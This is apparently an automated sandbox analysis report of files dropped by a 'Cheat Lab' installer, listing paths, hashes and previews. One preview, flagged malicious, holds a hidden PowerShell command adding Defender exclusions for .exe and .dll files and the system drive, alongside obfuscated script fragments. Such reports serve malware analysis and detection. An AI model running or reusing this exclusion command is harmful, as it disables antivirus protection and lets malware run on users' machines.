                                                          Preview:Set zDhpIDcpqrcAlxGgLkUvwPFJxchCeWBFrEmfsidhVC=d..fAduJvnORhEDXDPjdSurCQvFUsX=VHAnKMzTyuTFbMOPqWsNs..XrcqdmtKkam=TpNySkpVipYAGPwHFYZpjRKvrKc..PcVAuDTEeUruDvWNtUxAbbthafH=mdeoPfuMgn..rWbEKVTGQVWsodUba=HiQVRtLSUdgdlmGA..EZSxamJRuDYUSURN=GdEoyzSSqCaALvLHZd..Set AWfIirLANYevvCOTdWonGZBsXsscuhjSEzhmdIv=v..SyUYuVXWDxLRRRAxY=QMdzmLpRegfCImrtNTHaRcz..DTAwMCMtaXFatnGoPgS=HwLkNNrHNFSxzRQGkiyAClp..TLqfjmDDDKQBiggZntsMykYj=qXIpsuvRqawMOxhefRJwfnW..yebTbGIMOHjCUxkDxKiWjjJKrKP=fkaCqPrfIDxxJfYio..iVGyGFdZGSaNPMQfvDgKBydV=QfMhXgCBaCUMlENkwplXVNHDzScS..Set leELlQfDMJEPkblWCjYAnAWuXZeIoTtTKriAfwZ=a..HgmGoJdbHRFvsZKunNk=HcTEKyifJGBjleRkvmPfMlBen..atbxRhOqRjcVVrBwNw=zkginJYYVwvTQygM..RfPhnlkFPAE=NLbAMykrWYKSfTYcaEQHdnpb..wVwrCJpzjidYzt=eIuSFXYEjQjlKXcfBZgKlpqzfBneL..vYAQEIsdSgedPjdnnvQSOYt=OTHNDrnWTEzhKUaNX..uqHUxNrRrwkTTb=uwLqEMPPublSeNErrUDStMUnUJM..vKZLWzESHM=nskAvlUqrnYoYfFQz..huUqOavbmWIp=cdBtASkbgZJIBnCwcdDkLxGn..CStZKYsUNCRvkyXoJZu=ahUUvtFyXZwJrG..Set qinDwsNNWKEpkGrecAhyfYlDGajWNAizFiWqkcyTEmXpRUx
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):161792
                                                          Entropy (8bit):5.6524531662931405
                                                          Encrypted:false
                                                          SSDEEP:1536:RqaHwsWcfcd0vtmgMbFuz08QuklMBNIi9u5aAwubPdMaj6iTcohiPfKj+P:Rq5eAg0Fuz08XvBNbIaAtbPf6jKj+P
                                                          MD5:10A6CD643B21F0059AB42452EC5AB856
                                                          SHA1:C34B2962C06AE2FAC66A65E539F26917B37EB63A
                                                          SHA-256:6D577C1D30670990D6ECDF467604F73D34919ABDDAF8DE6E9F6C10DF96650F8F
                                                          SHA-512:F00FC3B9B8AFA8F842B6D888D66FD69D5CA8052ADEA484FA7C094E60237583DDB6DD69F8E5AA2D81D7B8EB1321A0EA388D83148F7C03C7DB998DFD2EBD22EAD6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):126560
                                                          Entropy (8bit):6.112999751067496
                                                          Encrypted:false
                                                          SSDEEP:1536:YsxjgarB3RZg3EYrDWyu0uZo2+9BkxXiblenlJJyIE2UWb/hoQZ2OE3:YsxjgarB3RZgDWy4ZNogXJ3i2Umb2Oq
                                                          MD5:4CEF8E0E2D6507DEE7D7F4142130F334
                                                          SHA1:3F30F9B6BF0F61971929251AD5D87A95F16C6FF2
                                                          SHA-256:553A4947A037FC18B2143E2C44C0C976DC9A29460845A88AEFF9A4D7AC398DA8
                                                          SHA-512:ADFFE966BBE0D7D8F71A5546A9982701A214FD0D1DC1A33EC728A3302EE5F3D5D596FB5EF39EE4F80333CC1904C6C08C42E1D6F0B348B81453806E3191F1E85E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):919520
                                                          Entropy (8bit):6.451406895673526
                                                          Encrypted:false
                                                          SSDEEP:24576:rx90VXSK4fSa6HXr1iWn8Zlv2x4ntHurpllQ6a:Nq4Fb6HXr1iWnYs4ntHurpllQ6a
                                                          MD5:6189CDCB92AB9DDBFFD95FACD0B631FA
                                                          SHA1:B74C72CEFCB5808E2C9AE4BA976FA916BA57190D
                                                          SHA-256:519F7AC72BEBA9D5D7DCF71FCAC15546F5CFD3BCFC37A5129E63B4E0BE91A783
                                                          SHA-512:EE9CE27628E7A07849CD9717609688CA4229D47579B69E3D3B5B2E7C2433369DE9557EF6A13FA59964F57FB213CD8CA205B35F5791EA126BDE5A4E00F6A11CAF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):954
                                                          Entropy (8bit):4.937735805475593
                                                          Encrypted:false
                                                          SSDEEP:12:ISt0RiY7GSd1VIk/ko+jLbdhFp+9wkvt0Ri9qVIk/ko+jLbdhFp+9wkv:nt0vndd/ko+3bdh5wt0gQ/ko+3bdh5m
                                                          MD5:FA3F83871A37B5B904332F6AD851F38A
                                                          SHA1:628A558BEF01966F79A309025A9BE0538D33A0C6
                                                          SHA-256:2DEC36E29E4EDFA5A10FBB5019E6C974166960C18AFFF6F30161096A4FA1E173
                                                          SHA-512:D5C4005898290CB74A645C300865D504785058FEE1B45F75B6E441250D7ADD4F235C96C543D3BA6C9E949BA52B4AA2C5C21827BB3024CFCD8FEB0D4649FFB8FA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:5..+ & { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -Exclusio .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At line:1 char:5..+ & { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -Exclusio .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5784
                                                          Entropy (8bit):3.4920621874565785
                                                          Encrypted:false
                                                          SSDEEP:96:5wb5jTmmywV2BVrIovmkiGjxcj6BngOcvjb:5wbdTif/njVyvb
                                                          MD5:FC1BB6C87FD1F08B534E52546561C53C
                                                          SHA1:DB402C5C1025CF8D3E79DF7B868FD186243AA9D1
                                                          SHA-256:A04750ED5F05B82B90F6B8EA3748BA246AF969757A5A4B74A0E25B186ADD520B
                                                          SHA-512:5495F4AC3C8F42394A82540449526BB8DDD91ADF0A1A852A9E1F2D32A63858B966648B4099D9947D8AC68EE43824DACDA24C337C5B97733905E36C4921280E86
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:param(..  [alias("propFile")]      [Parameter(Mandatory=$true)] [string] $msiPropOutFilePath.. ,[alias("propSep")]       [Parameter(Mandatory=$true)] [string] $msiPropKVSeparator.. ,[alias("scriptFile")]    [Parameter(Mandatory=$true)] [string] $userScriptFilePath.. ,[alias("scriptArgsFile")][Parameter(Mandatory=$false)][string] $userScriptArgsFilePath.. ,[Parameter(Mandatory=$true)]                          [string] $testPrefix.. ,[switch]
                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):354
                                                          Entropy (8bit):3.5299924240696643
                                                          Encrypted:false
                                                          SSDEEP:6:QJilMcRIW02qGNlGtulZ/x56FpwkDjkRH37cnlj+SEEg8ZzWY:QJGHRIWT3GtqZ/epdjkh37kCsZyY
                                                          MD5:600BFA83AD3A937D36FB345A0CEE05A8
                                                          SHA1:527CEFC6C6FCF5D67920546F2A7BEF0DB53D43BE
                                                          SHA-256:FC1B5B652EE5E91939A8B7113280866DE2A31ADA0609C47FA3A2951CC96F5507
                                                          SHA-512:CF313D2250FCD98EDBCB9C63C3D38AC3A35D7E2935E58BA69D8E488728D930230D05697C840CA82EE2C004E5F19CBA3612F324E0D0EF76720AE9B888E0CBF9BA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:Param()....$command = "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath $env:SystemDrive -Force }"....powershell -WindowStyle hidden -Command $command
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1073657860
                                                          Entropy (8bit):0.016763196553014763
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B9DD622108F62A2288DEB12C8A7D85BA
                                                          SHA1:ADFCEFA6244DE1AAAB1CC8E77CD4E9998A42E6E8
                                                          SHA-256:32989B7C4647E1829CE0434B7EF60C70ABDA320ACE2D82C6A5A16C03524993D7
                                                          SHA-512:FC75846B24D629B9BC9D93F24F631185F5AC70E072062894198AEA9C8CEF84658D757C46D6D0F23783C7657FB07D413457305B7C19A99198ABDE6233DE9AB6FB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:MZ`.....................@...............................................!..L.!Require Windows..$....................c....................................................A.....A.....A......A.s........A.....Rich..................PE..L...9D.W.................B...n..............`....@.................................._......................................,........`..Dx..........C....1..............T...........................h...@............`...............................text....@.......B.................. ..`.rdata..j....`.......F..............@..@.data....\..........................@....rsrc...Dx...`...z..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.790557976647158
                                                          Encrypted:false
                                                          SSDEEP:48:68kM4rRDxNMk+wwnikZsFtRvlm4MI9BFipfbNtm:8vVDB+wwn0/MvzNt
                                                          MD5:A5CE3ABA68BDB438E98B1D0C70A3D95C
                                                          SHA1:013F5AA9057BF0B3C0C24824DE9D075434501354
                                                          SHA-256:9B860BE98A046EA97A7F67B006E0B1BC9AB7731DD2A0F3A9FD3D710F6C43278A
                                                          SHA-512:7446F1256873B51A59B9D2D3498CEF5A41DBCE55864C2A5FB8CB7D25F7D6E6D8EA249D551A45B75D99B1AD0D6FB4B5E4544E5CA77BCD627717D6598B5F566A79
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\..........."...0.............b&... ...@....@.. ....................................@..................................&..O....@.......................`.......%............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D&......H.......l ..............................................................J ....(....(....&+...(....*.BSJB............v4.0.30319......l.......#~..0...`...#Strings............#US.........#GUID...........#Blob...........G..........3......................................................%...l.%...3.....E.....[.................S...........8.....r.....G.................Y...........".........................=.....P ........,...c ................T...................).....1.....9.....A.
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):2048
                                                          Entropy (8bit):3.964154738242649
                                                          Encrypted:false
                                                          SSDEEP:48:YM0gdPmt55KnChgrpE5S6mcr7RpHtaHQAs9l:fdQD6CIjAPHtmQAs7
                                                          MD5:A9AA29ACAEFBFFC8F28FFAD10BC1B50D
                                                          SHA1:7A7C02F681A7D4B880D3A123A6BC185A8D286E2C
                                                          SHA-256:46EA490C95C53B6F204749AEF768B4B5F1E1E92D180EECCEE60AAB38C02B1BA3
                                                          SHA-512:A2A8ECB869276B683E251AB49C6DF13443B66BF4DD123748B590E0E7332084E651908EDAAAADE09422FA8C5536B91517CF2BBC3C82916ADD138830CEAEA4B5FC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"tasks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2YsNmMsNmUsYTgsNzgsODcsNjYsODcsYTAsN2MsODYsYTAsOGQsOTMsOWEsOTgsNmYsNzMsYTUsOGIsYTYsN2YsYWMsN2IsNjksNmIsNzEsODYsOTcsODcsOTUsOGIsNzgsNjgsNzAsYTgsN2IsN2UsNjMsNzAsOTgsNmMsNzQsZDEsYmQsYzYsY2MsYzEsYTgsYTUsZTgsYzIsOGYsODUsOTcsNjUsNzUsYTIsYjEsOTUsYzQsYzksYzYsN2EsNzIsNTgsNWIsZDYsYWMsYmIsOTYsYWQsZGEsYWQsYmYsZDAsNzYsOTQsODcsODQsN2MsYWQsZTcsYmQsZGMsYmQsZGIsOWYsOTAsODUsYTYsYzUsZDcsYmUsZDMsYmYsYjksOTQsOTUsZDMsYjIsYmQsOWYsYjMsY2YsYzAsODAsZDAsY2MsYmYsODksOGUsNTgsNjYsZTcsY2UsY2UsYmQsZWIsNjUsNmUsNTIsNzIsN2QsODMsNzcsYzYsY2QsYmEsYTcsYWIsZTUsYjEsNzEsNmIsNmUsOWMsNzgsNzIsOGQsYzYsYmYsZDMsYzMsYWQsYjIsZDcsYzIsOGYsODUsOTcsNzMsNjAsNTIsNjMsYjksY2MsYjksY2EsN2EsODAsNTgsNjksOWMsNjMsNzEsYTEsYzMsZDksYmMsNzQsYTUsNzQsZDUsODksZDUsYTEsYmUsZDksN2MsYTcsNmIsYTgsNzMsNj
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {CC73A368-D6F6-4385-86EB-175FBE031BB5}, Number of Words: 2, Subject: Cheat Lab, Author: Cheat Lab Inc., Name of Creating Application: Cheat Lab, Template: x64;1033, Comments: This installer database contains the logic and data required to install Cheat Lab., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                          Category:dropped
                                                          Size (bytes):3107840
                                                          Entropy (8bit):6.956854788632149
                                                          Encrypted:false
                                                          SSDEEP:49152:hAKMMZKumZrWq4Fb6HXr1iWnYs4ntHurpllQ6aruxtZyTreUuyZD6lvVz94OCPTG:NKqFnWneuxqTgvVWvPDNUl
                                                          MD5:9014ACFCA65FCA4BDF8B5F561C4A1783
                                                          SHA1:C8FCDEFB8BA4F700801FC0E97811661FA972DE30
                                                          SHA-256:EFEA578CDAC3D52601D43B6C4570D94E8FCBDD701573B33612551050E8246CD2
                                                          SHA-512:B3BD5542E0CE2F8B17E8DA95B2E1D24B00A7517E707BB20DFCC0C33C5A210CA73AA5D52A83D24CFE0E8A7D7F05B93047D561F0F62898457F7FD0801B44C7FBC5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):191968
                                                          Entropy (8bit):6.4059654303545885
                                                          Encrypted:false
                                                          SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                          MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                          SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                          SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                          SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):386047
                                                          Entropy (8bit):6.411221173890974
                                                          Encrypted:false
                                                          SSDEEP:6144:5BKwXYBWHRuEFW9RzLLhrUmdHDZ19MhpBKwXYBWHRuEFW9RzLLhrUmdHDZ19MhK:+aHRuEs3Xmm9DZEwaHRuEs3Xmm9DZE4
                                                          MD5:DA90D7FF318173198360F78A8C69314A
                                                          SHA1:E78FD996261AD71058780FD4478608772E67478E
                                                          SHA-256:EDE72C5F817CFE2F33B5C125F8EE594DE8FA5DC8D812143DCBD04E72CCFDD189
                                                          SHA-512:DD42F55FDEB7EF94789EED6C7FC7892BA9C2A9E5DD4B3E19F60F51DB83350315E5119D6F1CD4DE762D7E6E09B910D8D9E09F05F19D3C04E7732AD33D5D55F5A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...@IXOS.@.....@..,X.@.....@.....@.....@.....@.....@......&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}..Cheat Lab..Cheat.Lab.2.7.2.msi.@.....@.....@.....@........&.{CC73A368-D6F6-4385-86EB-175FBE031BB5}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Lab......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{F1DA0363-909C-400E-A21B-7B2D5946B577}/.C:\Program Files\Cheat Lab Inc\Cheat Lab\config.@.......@.....@.....@......&.{630AA01D-F530-4CBA-8FD1-AF202D37234B}5.C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe.@.......@.....@.....@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]J...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):191968
                                                          Entropy (8bit):6.4059654303545885
                                                          Encrypted:false
                                                          SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                          MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                          SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                          SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                          SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):588768
                                                          Entropy (8bit):6.567039334307586
                                                          Encrypted:false
                                                          SSDEEP:12288:LBX/lKyuDvn4SsWPbV5BPsahK7RcekeUuyZD6WGvzQ5VEPL2Ra3D:x12h2SekeUuyZD6lvs0zqa3
                                                          MD5:7B7D9E2C9B8236E7155F2F97254CB40E
                                                          SHA1:99621FC9D14511428D62D91C31865FB2C4625663
                                                          SHA-256:DF58FABA241328B9645DCB5DEC387EC5EDD56E2D878384A4783F2C0A66F85897
                                                          SHA-512:FBAA1560F03255F73BE3E846959E4B7CBB1C24165D014ED01245639ADD6CC463975E5558567AB5704E18C9078A8A071C9E38DC1E499BA6E3DC507D4275B4A228
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.166620606681732
                                                          Encrypted:false
                                                          SSDEEP:12:JSbX72FjWiAGiLIlHVRp+h/7777777777777777777777777vDHFcc+uWN1l0i8Q:JTQI5WScWyF
                                                          MD5:8480D1B6F4551288B0CB164A7D59F21D
                                                          SHA1:1D7D78AF0374EAB9012568684DEE12677597ECF4
                                                          SHA-256:5B15AC9A3FB254D35F1E7D6B297CCBC1D3B6A9A91B9BEC53EBB78970CF0E8565
                                                          SHA-512:90F4517B49EF71C9ACBF277C03732A78924061B338869B2AC140B05A4D6EC08A287A70E52EFF8CC5FCCEABCED6871B35EFED74DBEBF3460349B996A1E488F1A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.5896998966353775
                                                          Encrypted:false
                                                          SSDEEP:48:X8PhXuRc06WXJunT5ZWZNDcdWQSkdWbVAEkrCy9oYoxMWdW9SkdW/TDS:WhX1FnTXWpa+eRCk
                                                          MD5:A2EF02B9D0332ABC9BC7FF8CBF714057
                                                          SHA1:17B92D0F80CF9AB3661C37DDFE1F29D1DA2DBBA2
                                                          SHA-256:EF8ABA13AD4D0550ECB54EB1617C3188E067AB13D28212B4B766AE80F21D94BB
                                                          SHA-512:E6D8BF3C5DEB2F671D1EA2C3DCDF5D162410899F28F034B2790AC4465FC1F8DFE671DA4DABEDB7728B75904EB4F370FF9307A65F4E794F524E7AE528263AB582
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):432221
                                                          Entropy (8bit):5.3751674775646805
                                                          Encrypted:false
                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauc:zTtbmkExhMJCIpEr9
                                                          MD5:54F519A38E9D593E2FDBABABE01BEDDC
                                                          SHA1:3281BBFFB8913DFCDDAC77EF4ACF8C0B6C7F88FE
                                                          SHA-256:0100BD031D68160FEF46B10F99D09720EAB188BBDFFC0556F5B833BF41F9AB7D
                                                          SHA-512:FBF5E047356D573ECDBE53D9FE5C16363FB8ABED16AF6117E9424D661366F9DDF388E61A4A6E9F62CDF74187B22B7FC1668481CC7D3B340342613FBEDD4EBEAF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.271549551248805
                                                          Encrypted:false
                                                          SSDEEP:48:CQoPuWrM+CFXJNT58vWZNDcdWQSkdWbVAEkrCy9oYoxMWdW9SkdW/TDS:CRPglTmvWpa+eRCk
                                                          MD5:BD0B171CF613663EA0AA7C1C33FA4B31
                                                          SHA1:483639416BAF529881FAFFC6BBAE490D9555C254
                                                          SHA-256:4B9B46B13029D7AF90DACD0B921147CBBAF5DCAC0E9CED48F89EF87035A8FB81
